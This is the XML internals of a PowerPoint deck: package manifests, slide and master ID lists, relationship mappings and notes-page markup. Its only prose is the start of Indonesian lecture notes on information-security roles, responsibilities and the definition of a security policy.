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7.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8.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9.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0.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1.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2.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3.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14.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5.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6.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17.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+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8.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19.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20.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+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21.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22.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23.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24.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+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25.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theme/theme26.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+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theme/theme27.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+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theme/theme28.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+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theme/theme29.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme3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theme/themeOverride1.xml" ContentType="application/vnd.openxmlformats-officedocument.themeOverr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theme/themeOverride2.xml" ContentType="application/vnd.openxmlformats-officedocument.themeOverride+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide160.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/theme/themeOverride3.xml" ContentType="application/vnd.openxmlformats-officedocument.themeOverride+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide161.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/theme/themeOverride4.xml" ContentType="application/vnd.openxmlformats-officedocument.themeOverride+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide162.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/theme/themeOverride5.xml" ContentType="application/vnd.openxmlformats-officedocument.themeOverride+xml"/>
  <Override PartName="/ppt/notesSlides/notesSlide163.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.notesSlide+xml"/>
  <Override PartName="/ppt/theme/themeOverride6.xml" ContentType="application/vnd.openxmlformats-officedocument.themeOverr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theme/themeOverride7.xml" ContentType="application/vnd.openxmlformats-officedocument.themeOverr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 id="2147483687" r:id="rId3"/>
    <p:sldMasterId id="2147483704" r:id="rId4"/>
    <p:sldMasterId id="2147483716" r:id="rId5"/>
    <p:sldMasterId id="2147483746" r:id="rId6"/>
    <p:sldMasterId id="2147483758" r:id="rId7"/>
    <p:sldMasterId id="2147483776" r:id="rId8"/>
    <p:sldMasterId id="2147483794" r:id="rId9"/>
    <p:sldMasterId id="2147483813" r:id="rId10"/>
    <p:sldMasterId id="2147483832" r:id="rId11"/>
    <p:sldMasterId id="2147483851" r:id="rId12"/>
    <p:sldMasterId id="2147483881" r:id="rId13"/>
    <p:sldMasterId id="2147483899" r:id="rId14"/>
    <p:sldMasterId id="2147483917" r:id="rId15"/>
    <p:sldMasterId id="2147483935" r:id="rId16"/>
    <p:sldMasterId id="2147483953" r:id="rId17"/>
    <p:sldMasterId id="2147483983" r:id="rId18"/>
    <p:sldMasterId id="2147483995" r:id="rId19"/>
    <p:sldMasterId id="2147484013" r:id="rId20"/>
    <p:sldMasterId id="2147484031" r:id="rId21"/>
    <p:sldMasterId id="2147484049" r:id="rId22"/>
    <p:sldMasterId id="2147484067" r:id="rId23"/>
    <p:sldMasterId id="2147484079" r:id="rId24"/>
    <p:sldMasterId id="2147484097" r:id="rId25"/>
    <p:sldMasterId id="2147484114" r:id="rId26"/>
    <p:sldMasterId id="2147484132" r:id="rId27"/>
    <p:sldMasterId id="2147484150" r:id="rId28"/>
    <p:sldMasterId id="2147484168" r:id="rId29"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId232"/>
  </p:notes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 id="290" r:id="rId64"/>
    <p:sldId id="291" r:id="rId65"/>
    <p:sldId id="292" r:id="rId66"/>
    <p:sldId id="293" r:id="rId67"/>
    <p:sldId id="294" r:id="rId68"/>
    <p:sldId id="295" r:id="rId69"/>
    <p:sldId id="296" r:id="rId70"/>
    <p:sldId id="297" r:id="rId71"/>
    <p:sldId id="298" r:id="rId72"/>
    <p:sldId id="299" r:id="rId73"/>
    <p:sldId id="300" r:id="rId74"/>
    <p:sldId id="301" r:id="rId75"/>
    <p:sldId id="302" r:id="rId76"/>
    <p:sldId id="303" r:id="rId77"/>
    <p:sldId id="304" r:id="rId78"/>
    <p:sldId id="305" r:id="rId79"/>
    <p:sldId id="306" r:id="rId80"/>
    <p:sldId id="307" r:id="rId81"/>
    <p:sldId id="308" r:id="rId82"/>
    <p:sldId id="309" r:id="rId83"/>
    <p:sldId id="310" r:id="rId84"/>
    <p:sldId id="311" r:id="rId85"/>
    <p:sldId id="312" r:id="rId86"/>
    <p:sldId id="313" r:id="rId87"/>
    <p:sldId id="314" r:id="rId88"/>
    <p:sldId id="315" r:id="rId89"/>
    <p:sldId id="316" r:id="rId90"/>
    <p:sldId id="317" r:id="rId91"/>
    <p:sldId id="318" r:id="rId92"/>
    <p:sldId id="319" r:id="rId93"/>
    <p:sldId id="320" r:id="rId94"/>
    <p:sldId id="321" r:id="rId95"/>
    <p:sldId id="322" r:id="rId96"/>
    <p:sldId id="323" r:id="rId97"/>
    <p:sldId id="324" r:id="rId98"/>
    <p:sldId id="325" r:id="rId99"/>
    <p:sldId id="326" r:id="rId100"/>
    <p:sldId id="327" r:id="rId101"/>
    <p:sldId id="328" r:id="rId102"/>
    <p:sldId id="329" r:id="rId103"/>
    <p:sldId id="330" r:id="rId104"/>
    <p:sldId id="331" r:id="rId105"/>
    <p:sldId id="332" r:id="rId106"/>
    <p:sldId id="333" r:id="rId107"/>
    <p:sldId id="334" r:id="rId108"/>
    <p:sldId id="335" r:id="rId109"/>
    <p:sldId id="336" r:id="rId110"/>
    <p:sldId id="337" r:id="rId111"/>
    <p:sldId id="338" r:id="rId112"/>
    <p:sldId id="339" r:id="rId113"/>
    <p:sldId id="340" r:id="rId114"/>
    <p:sldId id="341" r:id="rId115"/>
    <p:sldId id="342" r:id="rId116"/>
    <p:sldId id="343" r:id="rId117"/>
    <p:sldId id="344" r:id="rId118"/>
    <p:sldId id="345" r:id="rId119"/>
    <p:sldId id="346" r:id="rId120"/>
    <p:sldId id="347" r:id="rId121"/>
    <p:sldId id="348" r:id="rId122"/>
    <p:sldId id="349" r:id="rId123"/>
    <p:sldId id="350" r:id="rId124"/>
    <p:sldId id="351" r:id="rId125"/>
    <p:sldId id="352" r:id="rId126"/>
    <p:sldId id="353" r:id="rId127"/>
    <p:sldId id="354" r:id="rId128"/>
    <p:sldId id="355" r:id="rId129"/>
    <p:sldId id="356" r:id="rId130"/>
    <p:sldId id="357" r:id="rId131"/>
    <p:sldId id="358" r:id="rId132"/>
    <p:sldId id="359" r:id="rId133"/>
    <p:sldId id="360" r:id="rId134"/>
    <p:sldId id="361" r:id="rId135"/>
    <p:sldId id="362" r:id="rId136"/>
    <p:sldId id="363" r:id="rId137"/>
    <p:sldId id="364" r:id="rId138"/>
    <p:sldId id="365" r:id="rId139"/>
    <p:sldId id="366" r:id="rId140"/>
    <p:sldId id="367" r:id="rId141"/>
    <p:sldId id="368" r:id="rId142"/>
    <p:sldId id="369" r:id="rId143"/>
    <p:sldId id="370" r:id="rId144"/>
    <p:sldId id="371" r:id="rId145"/>
    <p:sldId id="372" r:id="rId146"/>
    <p:sldId id="373" r:id="rId147"/>
    <p:sldId id="374" r:id="rId148"/>
    <p:sldId id="375" r:id="rId149"/>
    <p:sldId id="376" r:id="rId150"/>
    <p:sldId id="377" r:id="rId151"/>
    <p:sldId id="378" r:id="rId152"/>
    <p:sldId id="379" r:id="rId153"/>
    <p:sldId id="380" r:id="rId154"/>
    <p:sldId id="381" r:id="rId155"/>
    <p:sldId id="382" r:id="rId156"/>
    <p:sldId id="383" r:id="rId157"/>
    <p:sldId id="384" r:id="rId158"/>
    <p:sldId id="385" r:id="rId159"/>
    <p:sldId id="386" r:id="rId160"/>
    <p:sldId id="387" r:id="rId161"/>
    <p:sldId id="388" r:id="rId162"/>
    <p:sldId id="389" r:id="rId163"/>
    <p:sldId id="390" r:id="rId164"/>
    <p:sldId id="391" r:id="rId165"/>
    <p:sldId id="392" r:id="rId166"/>
    <p:sldId id="393" r:id="rId167"/>
    <p:sldId id="394" r:id="rId168"/>
    <p:sldId id="395" r:id="rId169"/>
    <p:sldId id="396" r:id="rId170"/>
    <p:sldId id="397" r:id="rId171"/>
    <p:sldId id="398" r:id="rId172"/>
    <p:sldId id="399" r:id="rId173"/>
    <p:sldId id="400" r:id="rId174"/>
    <p:sldId id="401" r:id="rId175"/>
    <p:sldId id="402" r:id="rId176"/>
    <p:sldId id="403" r:id="rId177"/>
    <p:sldId id="404" r:id="rId178"/>
    <p:sldId id="405" r:id="rId179"/>
    <p:sldId id="406" r:id="rId180"/>
    <p:sldId id="407" r:id="rId181"/>
    <p:sldId id="408" r:id="rId182"/>
    <p:sldId id="409" r:id="rId183"/>
    <p:sldId id="410" r:id="rId184"/>
    <p:sldId id="411" r:id="rId185"/>
    <p:sldId id="412" r:id="rId186"/>
    <p:sldId id="413" r:id="rId187"/>
    <p:sldId id="414" r:id="rId188"/>
    <p:sldId id="415" r:id="rId189"/>
    <p:sldId id="416" r:id="rId190"/>
    <p:sldId id="417" r:id="rId191"/>
    <p:sldId id="418" r:id="rId192"/>
    <p:sldId id="419" r:id="rId193"/>
    <p:sldId id="420" r:id="rId194"/>
    <p:sldId id="421" r:id="rId195"/>
    <p:sldId id="422" r:id="rId196"/>
    <p:sldId id="423" r:id="rId197"/>
    <p:sldId id="424" r:id="rId198"/>
    <p:sldId id="425" r:id="rId199"/>
    <p:sldId id="426" r:id="rId200"/>
    <p:sldId id="427" r:id="rId201"/>
    <p:sldId id="428" r:id="rId202"/>
    <p:sldId id="429" r:id="rId203"/>
    <p:sldId id="430" r:id="rId204"/>
    <p:sldId id="431" r:id="rId205"/>
    <p:sldId id="432" r:id="rId206"/>
    <p:sldId id="433" r:id="rId207"/>
    <p:sldId id="434" r:id="rId208"/>
    <p:sldId id="435" r:id="rId209"/>
    <p:sldId id="436" r:id="rId210"/>
    <p:sldId id="437" r:id="rId211"/>
    <p:sldId id="438" r:id="rId212"/>
    <p:sldId id="439" r:id="rId213"/>
    <p:sldId id="440" r:id="rId214"/>
    <p:sldId id="441" r:id="rId215"/>
    <p:sldId id="442" r:id="rId216"/>
    <p:sldId id="443" r:id="rId217"/>
    <p:sldId id="444" r:id="rId218"/>
    <p:sldId id="445" r:id="rId219"/>
    <p:sldId id="446" r:id="rId220"/>
    <p:sldId id="447" r:id="rId221"/>
    <p:sldId id="448" r:id="rId222"/>
    <p:sldId id="449" r:id="rId223"/>
    <p:sldId id="450" r:id="rId224"/>
    <p:sldId id="451" r:id="rId225"/>
    <p:sldId id="452" r:id="rId226"/>
    <p:sldId id="453" r:id="rId227"/>
    <p:sldId id="454" r:id="rId228"/>
    <p:sldId id="455" r:id="rId229"/>
    <p:sldId id="456" r:id="rId230"/>
    <p:sldId id="457" r:id="rId2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1264" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="816" y="-378"/>
      </p:cViewPr>
      <p:guideLst/>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="-2328"/>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slideMaster" Target="slideMasters/slideMaster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slide" Target="slides/slide197.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide78.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster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slideMaster" Target="slideMasters/slideMaster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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster22.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide35.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide89.xml"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide110.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide56.xml"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide121.xml"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide142.xml"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide163.xml"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide177.xml"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide198.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster12.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide79.xml"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide100.xml"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide25.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide46.xml"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide67.xml"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide111.xml"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide132.xml"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide153.xml"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide188.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster6.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster23.xml"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide90.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide36.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide57.xml"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide101.xml"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide122.xml"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide143.xml"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide164.xml"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide178.xml"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide199.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster13.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide80.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.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20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide91.xml"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide112.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster7.xml"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide133.xml"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide154.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide189.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster24.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31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide102.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208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide179.xml"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide200.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster14.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster8.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219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide190.xml"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide201.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster25.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide38.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster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slide" Target="slides/slide196.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster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slideMaster" Target="slideMasters/slideMaster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36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster26.xml"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide202.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slideMaster" Target="slideMasters/slideMaster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 Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide182.xml"/><Relationship Id="rId232" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="notesMasters/notesMaster1.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster27.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide40.xml"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide84.xml"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide105.xml"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide51.xml"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide126.xml"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide147.xml"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide168.xml"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide172.xml"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide193.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster17.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24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide95.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide41.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide62.xml"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide116.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide137.xml"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide158.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster1.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide183.xml"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster28.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide85.xml"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide31.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide52.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide106.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202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide173.xml"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide194.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster18.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide21.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide75.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide96.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1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide42.xml"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide63.xml"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide184.xml"/><Relationship Id="rId234"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Master" Target="slideMasters/slideMaster29.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide86.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99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide170.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide174.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster19.xml"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide195.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide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189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide160.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster3.xml"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide185.xml"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.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375E8-5A11-49D9-B52C-47399E7B5F66}" type="datetimeFigureOut">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>10/09/2025</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01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70287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a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3243289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Peran dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Jawab </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Informasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pernyataan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> formal yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
